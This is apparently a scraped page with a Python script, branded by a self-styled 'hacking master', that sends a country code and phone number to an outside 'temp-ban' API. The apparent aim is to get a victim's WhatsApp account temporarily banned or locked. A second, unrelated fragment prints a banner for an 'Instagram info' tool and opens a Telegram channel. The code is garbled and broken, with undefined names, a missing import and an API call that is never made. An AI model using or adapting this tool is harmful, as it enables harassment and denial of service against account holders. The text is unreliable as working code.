Whatsappotplockek - Deepu Python
Whatsappotplockek - Deepu Python
import os
import time
from rich import print
print(f'''
[bold {color}]●[bold {colors[(colors.index(color) + 1) % len(colors)]}] ●[bold
{colors[(colors.index(color) + 2) % len(colors)]}] ●
.---. .-----------
/ \ __ / ------
/ / \( )/ -----
////// ' \/ ` ---
//// / // : : ---
// / / /` '--
// //..\\\
====UU====UU====
'//||\\`
[bold white]======================================
[bold white][[bold red]^[bold white]] [bold green] Author: DEEPAK [HACKING__MASTER]
\n[bold white][[bold red]^[bold white]] [bold green] Github: LOADING..... \n[bold
white][[bold red]^[bold white]] [bold green] Telegram:
https://t.me/hackingmaster009
[bold white]====================================== ''')
time.sleep(0.5)
print('''[bold white]======================================
[bold white][[bold red]^[bold white]] [bold green] Author: DEEPAK [HACKING__MASTER]
[bold white][[bold red]^[bold white]] [bold green] Github: LOADING..... [bold
white][[bold red]^[bold white]] [bold green] Telegram:https://t.me/hackingmaster009
[bold white]====================================== ''')
# API function
def temp_ban_api(country_code, phone_number):
try:
api_url = f"https://api-bruxiintk.online/api/temp-ban?
apikey=bx&ddi={country_code}&numero={phone_number}"
response = requests.get(api_url)
response.raise_for_status() # Raise an exception for HTTP errors
if response.status_code == 200:
return "\n[bold green] [94m[✓]Successfully done\n [bold
green]Completed..!!\n\n[bold green]Thank You For Use My Script!!\n Created DEEPAK
[HACKING__MASTER]\n"
else:
return "Not done"
except requests.exceptions.RequestException as e:
return f"Error: {e}"
# Main function
def main():
otp_lock_banner() # Display OTP Lock banner
country_code = input("\n\033[90m[\033[91m?\033[90m]] \033[92m[?]Enter Your
Country Code(ex..+91) " '\n └─> ')
if not country_code.startswith("+"):
country_code = "+" + country_code
if __name__ == "__main__":
main()
import requests
import os
import time
import sys
import webbrowser
from fake_useragent import UserAgent
E = '\033[1;31m'
B = '\033[2;36m'
G = '\033[1;32m'
S = '\033[1;33m'
F = '\033[1;32m' # اخضر
B = "\033[1;30m" # Black
R = "\033[1;31m" # Red
G = "\033[1;32m" # Green
Y = "\033[1;33m" # Yellow
Bl = "\033[1;34m" # Blue
P = "\033[1;35m" # Purple
C = "\033[1;36m" # Cyan
W = "\033[1;37m" # White
PN = "\033[1;35m" # PINK
def to(s):
for char in s + "\n":
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(23.0 / 8000)
to(
f"""{G}|{C}=============================================={G}|
{G}| Creator : DEEPAK [HACKING__MASTER] {G} |
{G}| {Y}Tools : Instagram info{G} |
{G}| {PN}Expire : LIFETIME {G} |
{G}| {W}Link : https://t.me/hackingmaster009{G} |
{G}|{C}=============================================={G}|"""
)
webbrowser.open("https://t.me/hackingmaster009")